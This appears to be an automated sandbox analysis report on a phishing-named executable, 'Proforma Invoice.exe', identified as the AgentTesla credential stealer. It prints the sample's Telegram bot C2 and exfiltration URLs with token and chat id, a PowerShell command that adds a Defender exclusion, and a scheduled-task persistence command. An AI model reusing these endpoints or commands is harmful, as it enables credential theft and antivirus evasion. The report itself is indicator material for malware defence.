Windows Analysis Report
Proforma Invoice.exe

Overview

General Information

Sample Name: Proforma Invoice.exe
Analysis ID: 668067
MD5: bea52e8910c076f5720ac20970e48a10
SHA1: 42777245a3f79ea5b2bcf1ea48811111b1cc3529
SHA256: 8d5f8190ec870db510d2b95b830a07bf3c67d9996df775778dfa82b6c2bdd7b3
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
.NET source code contains potential unpacker
Yara detected Generic Downloader
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Proforma Invoice.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\Proforma Invoice.exe" MD5: BEA52E8910C076F5720AC20970E48A10)
    • powershell.exe (PID: 2936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6456 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmp" MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Proforma Invoice.exe (PID: 1500 cmdline: C:\Users\user\Desktop\Proforma Invoice.exe MD5: BEA52E8910C076F5720AC20970E48A10)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendMessage"}
{"Exfil Mode": "Telegram", "Chat id": "5359531870", "Chat URL": "https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument"}
Source | Rule | Description | Author | Strings
00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Source | Rule | Description | Author | Strings
8.0.Proforma Invoice.exe.400000.8.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
8.0.Proforma Invoice.exe.400000.8.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
8.0.Proforma Invoice.exe.400000.8.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
8.0.Proforma Invoice.exe.400000.8.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen |
  • 0x32c49:$s10: logins
  • 0x326b0:$s11: credential
  • 0x2ebf0:$g1: get_Clipboard
  • 0x2ebfe:$g2: get_Keyboard
  • 0x2ec0b:$g3: get_Password
  • 0x2fef9:$g4: get_CtrlKeyDown
  • 0x2ff09:$g5: get_ShiftKeyDown
  • 0x2ff1a:$g6: get_AltKeyDown
8.0.Proforma Invoice.exe.400000.10.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

No Sigma rule has matched
Timestamp: 07/18/22-10:25:15.675809
Source IP: 192.168.2.6
Destination IP: 149.154.167.220
Source Port: 49781
Destination Port: 443
SID: 2851779
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: Proforma Invoice.exe | Virustotal: Detection: 31%
Source: Proforma Invoice.exe | Metadefender: Detection: 37%
Source: Proforma Invoice.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe | Metadefender: Detection: 37%
Source: C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe | ReversingLabs: Detection: 55%
Source: Proforma Invoice.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe | Joe Sandbox ML: detected
Source: 8.2.Proforma Invoice.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.Proforma Invoice.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.Proforma Invoice.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.Proforma Invoice.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.Proforma Invoice.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 8.0.Proforma Invoice.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 0.2.Proforma Invoice.exe.459ae68.9.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "5359531870", "Chat URL": "https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument"}
Source: Proforma Invoice.exe.7152.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendMessage"}
Source: Proforma Invoice.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49781 version: TLS 1.2
Source: Proforma Invoice.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.6:49781 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: unknown | DNS query: name: api.telegram.org
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.45cf688.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.459ae68.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Proforma Invoice.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Proforma Invoice.exe.4564848.10.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
  POST /bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8da68ac1cc55b48
  Host: api.telegram.org
  Content-Length: 1022
  Expect: 100-continue
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  POST /bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8da68ad9679701f
  Host: api.telegram.org
  Content-Length: 1900
  Expect: 100-continue
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443
Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: Proforma Invoice.exe, 00000008.00000002.642687799.0000000003255000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000003.453167723.0000000001254000.00000004.00000020.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643016652.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643092928.00000000032CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://a7Yu7sNuvhjH4U.com
Source: Proforma Invoice.exe, 00000008.00000002.642687799.0000000003255000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://a7Yu7sNuvhjH4U.comx
Source: Proforma Invoice.exe | String found in binary or memory: http://api.eve-central.com/api/marketstat
Source: Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.dr | String found in binary or memory: http://api.eve-central.com/api/marketstatIDon
Source: Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.dr | String found in binary or memory: http://api.eve-online.com/
Source: Proforma Invoice.exe, 00000008.00000002.643272697.0000000003302000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643092928.00000000032CB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: ebJpPhiwjcAviB.exe.0.dr | String found in binary or memory: http://code.google.com/p/com232term
Source: Proforma Invoice.exe, 00000008.00000002.647450061.00000000068D3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Proforma Invoice.exe, 00000008.00000002.647093535.0000000006865000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://eIoKIh.com
Source: Proforma Invoice.exe, ebJpPhiwjcAviB.exe.0.dr | String found in binary or memory: http://eve.no-ip.de/prices/30d/
Source: Proforma Invoice.exe, 00000000.00000002.423566944.0000000006A22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: ebJpPhiwjcAviB.exe.0.dr | String found in binary or memory: http://github.com/riuson/com232term
Source: Proforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org%
Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: Proforma Invoice.exe, 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Proforma Invoice.exe, 00000008.00000000.410130498.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/
Source: Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument
Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocumentdocument-----
Source: Proforma Invoice.exe, 00000008.00000002.643035960.00000000032B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
Source: Proforma Invoice.exe, 00000008.00000002.643272697.0000000003302000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.orgD8
Source: Proforma Invoice.exe, 00000008.00000002.640067759.0000000002F61000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | HTTP traffic detected:
  POST /bot5573921253:AAHXKq7lrmioCzUGP-9p7lopfbVX0A_ZdQA/sendDocument HTTP/1.1
  Content-Type: multipart/form-data; boundary=---------------------------8da68ac1cc55b48
  Host: api.telegram.org
  Content-Length: 1022
  Expect: 100-continue
  Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49781 version: TLS 1.2

System Summary

Source: 8.0.Proforma Invoice.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 8.0.Proforma Invoice.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Proforma Invoice.exe.459ae68.9.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 8.0.Proforma Invoice.exe.400000.12.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 8.0.Proforma Invoice.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Proforma Invoice.exe.45cf688.11.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Proforma Invoice.exe.45cf688.11.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Proforma Invoice.exe.459ae68.9.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 8.0.Proforma Invoice.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.Proforma Invoice.exe.4564848.10.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: initial sample | Static PE information: Filename: Proforma Invoice.exe
Source: 8.2.Proforma Invoice.exe.400000.0.unpack, <PrivateImplementationDetails>{FC196D4E-8A43-4DC5-A5AE-085A2CD06847}/E9DED5F1-FF4E-4645-84C8-74E99AE54950.cs | Large array initialization: .cctor: array initializer size 11689
Source: 8.0.Proforma Invoice.exe.400000.8.unpack, <PrivateImplementationDetails>{FC196D4E-8A43-4DC5-A5AE-085A2CD06847}/E9DED5F1-FF4E-4645-84C8-74E99AE54950.cs | Large array initialization: .cctor: array initializer size 11689
Source: 8.0.Proforma Invoice.exe.400000.6.unpack, <PrivateImplementationDetails>{FC196D4E-8A43-4DC5-A5AE-085A2CD06847}/E9DED5F1-FF4E-4645-84C8-74E99AE54950.cs | Large array initialization: .cctor: array initializer size 11689
Source: Proforma Invoice.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 8.0.Proforma Invoice.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 8.0.Proforma Invoice.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Proforma Invoice.exe.459ae68.9.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 8.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 8.0.Proforma Invoice.exe.400000.12.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 8.0.Proforma Invoice.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Proforma Invoice.exe.45cf688.11.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Proforma Invoice.exe.45cf688.11.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Proforma Invoice.exe.459ae68.9.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 8.0.Proforma Invoice.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.Proforma Invoice.exe.4564848.10.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Proforma Invoice.exe, 00000000.00000002.417720343.0000000002C24000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebNBFdhruQlCkFVzVzjIW.exe4 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.416609324.00000000029D7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.418665405.0000000004169000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameThookinieng.dllJ vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.416363031.0000000002961000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.416363031.0000000002961000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTokenImpersonation.dll" vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.425054578.0000000007440000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTokenImpersonation.dll" vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.421261359.0000000004564000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebNBFdhruQlCkFVzVzjIW.exe4 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000003.395674663.0000000008768000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000000.369717521.000000000059E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000000.00000002.426347057.000000000ADA0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameThookinieng.dllJ vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000008.00000002.637983278.0000000000CAE000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000008.00000000.410969105.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebNBFdhruQlCkFVzVzjIW.exe4 vs Proforma Invoice.exe
Source: Proforma Invoice.exe, 00000008.00000002.638082083.00000000010F8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Proforma Invoice.exe
Source: Proforma Invoice.exe | Binary or memory string: OriginalFilenameXmlEn.exe6 vs Proforma Invoice.exe
Source: Proforma Invoice.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ebJpPhiwjcAviB.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Proforma Invoice.exe | Virustotal: Detection: 31%
Source: Proforma Invoice.exe | Metadefender: Detection: 37%
Source: Proforma Invoice.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File read: C:\Users\user\Desktop\Proforma Invoice.exe
Source: Proforma Invoice.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Proforma Invoice.exe "C:\Users\user\Desktop\Proforma Invoice.exe"
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmp
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Process created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ebJpPhiwjcAviB" /XML "C:\Users\user\AppData\Local\Temp\tmp8D30.tmp
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Process created: C:\Users\user\Desktop\Proforma Invoice.exe C:\Users\user\Desktop\Proforma Invoice.exe
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\Proforma Invoice.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Proforma Invoice.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File created: C:\Users\user\AppData\Roaming\ebJpPhiwjcAviB.exe
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File created: C:\Users\user\AppData\Local\Temp\tmp8D30.tmp
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/10@2/2
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: Proforma Invoice.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5716:120:WilError_01
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Mutant created: \Sessions\1\BaseNamedObjects\yvSZwEJqePRQzBhnb
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3516:120:WilError_01
Source: Proforma Invoice.exe, VW/gs.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: ebJpPhiwjcAviB.exe.0.dr, VW/gs.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Proforma Invoice.exe.4c0000.0.unpack, VW/gs.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.0.Proforma Invoice.exe.4c0000.0.unpack, VW/gs.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 8.2.Proforma Invoice.exe.400000.0.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 8.0.Proforma Invoice.exe.bd0000.5.unpack, VW/gs.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 8.0.Proforma Invoice.exe.bd0000.11.unpack, VW/gs.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 8.0.Proforma Invoice.exe.bd0000.9.unpack, VW/gs.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Proforma Invoice.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Proforma Invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Proforma Invoice.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Proforma Invoice.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Proforma Invoice.exe, VW/gs.cs | .Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: ebJpPhiwjcAviB.exe.0.dr, VW/gs.cs | .Net Code: Lb System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
